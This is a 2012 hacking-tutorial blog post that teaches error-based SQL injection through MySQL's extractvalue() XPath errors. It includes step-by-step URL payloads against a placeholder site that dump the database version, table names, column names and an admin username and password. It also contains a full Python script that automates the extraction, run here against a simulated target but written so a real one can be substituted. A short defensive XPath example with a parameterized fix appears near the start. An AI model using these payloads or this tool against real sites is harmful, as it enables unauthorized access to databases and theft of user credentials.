Thursday, November 29, 2012

Hack Websites Using XPath Injection


NOTE: FOR EDUCATIONAL PURPOSES ONLY. IT IS TOTALLY ILLEGAL AND YOU WILL BE PUNISHED. SO DON'T TRY.

XPath Injection:
SQL injection is the most popular type of code injection attack, but several others can be just as dangerous to your applications and your data, including LDAP injection and XPath injection. An XPath injection attack is similar to a SQL injection attack, but its target is an XML document rather than a SQL database. XPath injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.
What is XML?
XML stands for Extensible Markup Language and was designed to describe data. It lets programmers define their own tags to store data; in XML the data is stored as nodes in a tree. The XML Path language, XPath, is used to query information from the nodes of an XML document. Please refer to XML Tutorial for more details on XML.
What is XPath?
“XML Path” or “XPath” 1.0 is a language for referring to parts of an XML document. Path expressions select elements and attributes in an XML document and evaluate to a node-set, a string, a Boolean or a number. XPath can be used directly by an application to query an XML document, or as part of a larger operation such as an XSLT transformation or an XQuery. Please refer to XPath Tutorial for more details on XPath.
In Detail:
Code injection is a technique for injecting code into a program by taking advantage of the unchecked assumptions the application makes about its inputs, in order to bypass or modify the originally intended functionality. All code injection attacks work the same way: the attacker feeds malicious code into the application through one of its input fields. So, for such an attack to be possible, there must be an entry point that does not perform adequate validation.
Consider a web application that uses XPath to query an XML document for a customer's social security number, passing the name and password values supplied by the user of the application. If the application embeds these values directly in the XPath query, it is vulnerable to XPath injection: a quote in the input closes the string literal and the rest of the input becomes part of the expression.
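The lookup described above, as an added example (not code from the original post), written in Python against a constructed customer document. It assumes the lxml package is installed; the vulnerable version pastes the user's values into the XPath string, the safe version passes them as XPath variables so they can never change the shape of the query.

```python
from lxml import etree

# Constructed customer store; the application in the text looks up an SSN
# by name and password.
CUSTOMERS_XML = b"""<customers>
  <customer><name>alice</name><password>hunter2</password><ssn>111-22-3333</ssn></customer>
  <customer><name>bob</name><password>s3cret</password><ssn>444-55-6666</ssn></customer>
</customers>"""
ROOT = etree.fromstring(CUSTOMERS_XML)


def ssn_lookup_vulnerable(name, password):
    """Embeds the user's values straight into the XPath expression,
    which is the flaw described in the text."""
    query = f"//customer[name='{name}' and password='{password}']/ssn/text()"
    return [str(s) for s in ROOT.xpath(query)]


def ssn_lookup_safe(name, password):
    """Same query using XPath variables ($n, $p): the values are bound by
    the engine, never parsed as part of the expression, so quotes and
    operators inside them are inert."""
    query = "//customer[name=$n and password=$p]/ssn/text()"
    return [str(s) for s in ROOT.xpath(query, n=name, p=password)]


# Classic bypass: the injected 'or' makes the predicate true for every
# customer, so the vulnerable query returns all SSNs with no valid password.
# Resulting predicate: name='' or 1=1 or ''='' and password='wrong'
BYPASS = "' or 1=1 or ''='"

if __name__ == "__main__":
    print("legit:     ", ssn_lookup_vulnerable("alice", "hunter2"))
    print("vulnerable:", ssn_lookup_vulnerable(BYPASS, "wrong"))
    print("safe:      ", ssn_lookup_safe(BYPASS, "wrong"))
```

Note that XPath's `and` binds tighter than `or`, so the payload needs two `or` clauses to swallow the `and password=...` test that follows it; a single `' or '1'='1` would still require the password to match.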
OK, so when to use it? Let us assume we have found a site that appears injectable from our usual quick tests, but when we try to inject using ORDER BY we get no errors, and the string injection method gives nothing either. Time to give up? Never. Let us now try error-based extraction through MySQL's XPath functions, which is what the rest of this post means by XPATH injection.
We start with a quick check to confirm the version, because this method only works on MySQL 5.1 and later (ExtractValue() and UpdateXML() were added in 5.1.5) and it needs the page to display database errors. Strictly speaking this is not XPath injection against an XML document as defined above: it is error-based SQL injection that abuses ExtractValue(), whose second argument is parsed as an XPath expression. When that parse fails, MySQL echoes the offending expression, and with it whatever we concatenated into it, in the error message. The leading 0x3a is a colon, which is not a valid start of an XPath expression and also serves as a separator; end the payload with `-- -` (or `--+`) so the comment marker keeps the trailing space it needs after the URL is decoded. The first check for version and user looks like this:
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))-- -
RESULT: XPATH syntax error: ':version info:user info'
OK, so the error confirms that this method works, and we already have the version and current user. Now we move on to the table names, like this:
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))-- -
RESULT: XPATH syntax error: ':<table name at the offset used in the LIMIT clause>'
This is the biggest problem with XPATH injection: it gets tricky here. The error shows a single value, so you walk the tables one at a time with LIMIT (limit 0,1, then limit 1,1, and so on) and keep track of every table name found. This can be very time consuming, but it is key that you use your brain to pick up on relationships that become obvious as you go, while keeping an eye out for juicy tables that may warrant further investigation in later steps. Two things make this much quicker: add `where table_schema=database()` to skip information_schema's own tables, and remember that MySQL shows at most 32 characters of the expression in the error, so a long name has to be pulled in pieces with substr(). I suggest first finding the lower and upper limits so you know what kind of range you are working with (some sites have only a few tables and others thousands in total).
Once you have the table names, you follow similar steps to pull the column details. It works very much like the tables and looks like this:
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 0,1)))-- -
RESULT: XPATH syntax error: ':<column name at the offset used in the LIMIT clause>'
This is just as time consuming as pulling the table names, and it is a bit tricky because the bare query does not tell you which columns belong to which table, or even which database. You do not have to guess: add `where table_name='mysql_auth_usr'` (or the hex form of the name, if quotes are a problem) to the information_schema.columns query and you get only that table's columns. Failing that, use your brain to make some logical determinations about what you find: having found a table named mysql_auth_usr and columns idx, username and password, it is not a great stretch to assume they go together. I tend to use a bit of trial and error on this last part, but if you think about it for a minute you can usually make the necessary connections to extract what you want. That being said, extraction of the data works exactly as it does for simple SQLi: you choose the columns you want, indicate the table to pull from, and parse the result out of the error. Keep a LIMIT on this query too; if the subquery returns more than one row, MySQL raises "Subquery returns more than 1 row" instead of the XPATH error. It looks like this:
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,idx,0x3a,username,0x3a,password) from mysql_auth_usr limit 0,1)))-- -
RESULT: XPATH syntax error: ':1:admin:password1'
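The whole procedure above (version and user, then tables, columns and rows via LIMIT offsets) as an added Python example; it is not the original post's tooling. It builds the extractvalue() payloads, parses the value back out of the XPATH error, and handles the two limits mentioned above: MySQL shows at most 32 characters of the expression, so each value is pulled in 31-character slices behind a one-character prefix, and a LIMIT offset past the last row makes the subquery NULL, which raises no error and ends the enumeration. To keep it runnable offline, the target is a constructed stand-in (`FakeTarget`, `FAKE_DB`) that answers from canned data and truncates the way MySQL does; the table, column and row values are invented sample data. With a real target, `fetch` would be a function that sends the query string and returns the response body.

```python
import re

# Added example, not the original post's code.  Everything below is a
# constructed simulation: no request is sent anywhere.
#
# MySQL's ExtractValue() reports at most 32 characters of the XPath expression
# it failed to parse, so a one-character prefix (0x7e, '~') leaves 31
# characters of real data per request.  The first argument (rand() in the
# post, 1 here) is irrelevant; the error is raised while parsing the second.
CHUNK = 31
ERROR_RE = re.compile(r"XPATH syntax error: '([^']*)'")


def payload(expr, pos):
    """Injected query string for one 31-character slice of a SQL expression."""
    return (f"id=1 and extractvalue(1,concat(0x7e,"
            f"substr(({expr}),{pos},{CHUNK})))-- -")


def parse_error(body):
    """Text inside the XPATH error, or None when the page showed no error."""
    m = ERROR_RE.search(body)
    return None if m is None else m.group(1)


def extract(fetch, expr):
    """Reassemble the full value of expr from successive error slices.

    fetch(query_string) returns the response body.  Returns None when the
    first request raised no error: the subquery yielded NULL (e.g. a LIMIT
    offset past the last row), concat(0x7e, NULL) is NULL, and
    extractvalue(1, NULL) fails silently."""
    out, pos = "", 1
    while True:
        err = parse_error(fetch(payload(expr, pos)))
        if err is None:
            return out or None
        chunk = err[1:]                 # strip the '~' prefix
        out += chunk
        if len(chunk) < CHUNK:          # short slice: end of the value
            return out
        pos += CHUNK


def enumerate_rows(fetch, expr_template, max_rows=1000):
    """Walk LIMIT offsets (limit 0,1, limit 1,1, ...) until the subquery
    returns NULL.  Filtering by table_schema / table_name ties columns to
    their table instead of guessing."""
    rows = []
    for i in range(max_rows):
        value = extract(fetch, expr_template.format(i=i))
        if value is None:
            break
        rows.append(value)
    return rows


TABLES = ("select table_name from information_schema.tables "
          "where table_schema=database() limit {i},1")
COLUMNS = ("select column_name from information_schema.columns "
           "where table_name='mysql_auth_usr' limit {i},1")
ROWS = ("select concat(idx,0x3a,username,0x3a,password) "
        "from mysql_auth_usr limit {i},1")


class FakeTarget:
    """Constructed stand-in for the vulnerable page: answers the injected
    subquery from a canned dictionary and truncates exactly as MySQL does."""
    INJECT_RE = re.compile(r"substr\(\((.*)\),(\d+),(\d+)\)\)\)-- -$")

    def __init__(self, db):
        self.db, self.requests = db, 0

    def fetch(self, query_string):
        self.requests += 1
        m = self.INJECT_RE.search(query_string)
        value = self.db.get(m.group(1)) if m else None
        if value is None:               # NULL => no XPATH error on the page
            return "<html><body>Welcome back!</body></html>"
        pos, length = int(m.group(2)), int(m.group(3))
        shown = ("~" + value[pos - 1:pos - 1 + length])[:32]
        return f"<html><body>XPATH syntax error: '{shown}'</body></html>"


FAKE_DB = {  # constructed sample data, not from any real system
    "version()": "5.5.28-0ubuntu0.12.04.3-log",
    "user()": "webapp@localhost",
    TABLES.format(i=0): "mysql_auth_usr",
    TABLES.format(i=1): "news_articles_and_press_releases_archive",  # 40 chars: needs 2 slices
    COLUMNS.format(i=0): "idx",
    COLUMNS.format(i=1): "username",
    COLUMNS.format(i=2): "password",
    ROWS.format(i=0): "1:admin:password1",
}


def dump(target):
    """Run the post's whole procedure against one target."""
    return {
        "version": extract(target.fetch, "version()"),
        "user": extract(target.fetch, "user()"),
        "tables": enumerate_rows(target.fetch, TABLES),
        "columns": enumerate_rows(target.fetch, COLUMNS),
        "rows": enumerate_rows(target.fetch, ROWS),
    }


if __name__ == "__main__":
    t = FakeTarget(FAKE_DB)
    for key, value in dump(t).items():
        print(f"{key}: {value}")
    print(f"{t.requests} requests")
```

The `FakeTarget` answers purely from its dictionary, so the only things it exercises are the payload shape, the 32-character truncation and the NULL-ends-enumeration behaviour; swapping in a real `fetch` is where the assumptions in the lead-in (numeric injection point, errors shown on the page, quotes allowed in the URL) have to hold.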
Now you have successfully injected and extracted the data using XPATH injection! Go pat yourself on the back for learning a new method and enjoy a well-deserved break ;) There are other XPATH queries that can be used, but this is the one I have found the best results with. You can also use updatexml(), which takes the same concat() as its second argument (updatexml(1,concat(0x3a,...),1)) and fails with the same XPATH error. I will continue to add to this as I investigate the technique more, but this concludes my write-up on XPATH injection using the EXTRACTVALUE() method for now. I hope you have found this interesting and educational, and as always, until next time, Enjoy!
